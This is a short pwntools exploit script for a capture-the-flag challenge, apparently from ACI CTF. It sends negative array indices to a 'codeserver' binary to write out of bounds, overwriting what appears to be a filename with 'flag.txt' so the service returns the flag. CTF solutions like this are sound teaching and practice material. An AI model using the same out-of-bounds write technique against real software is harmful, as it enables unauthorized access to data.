from pwn import *
sh = remote('challenge.acictf.com', 14000)
#sh = process('./codeserver')
sh.recvuntil("Quit\n")
sh.sendline("2")
sh.recvuntil("? ")
sh.sendline("-1023")
sh.recvuntil("? ")
sh.sendline("1734437990")
sh.recvuntil("Quit\n")
sh.sendline("2")
sh.recvuntil("? ")
sh.sendline("-1022")
sh.recvuntil("? ")
sh.sendline("1954051118")
sh.recvuntil("Quit\n")
sh.sendline("2")
sh.recvuntil("? ")
sh.sendline("-1021")
sh.recvuntil("? ")
sh.sendline("-4294967295")
sh.recvuntil("Quit\n")
sh.sendline("3")
flag = sh.recvline()
#sh.kill()
print(flag)

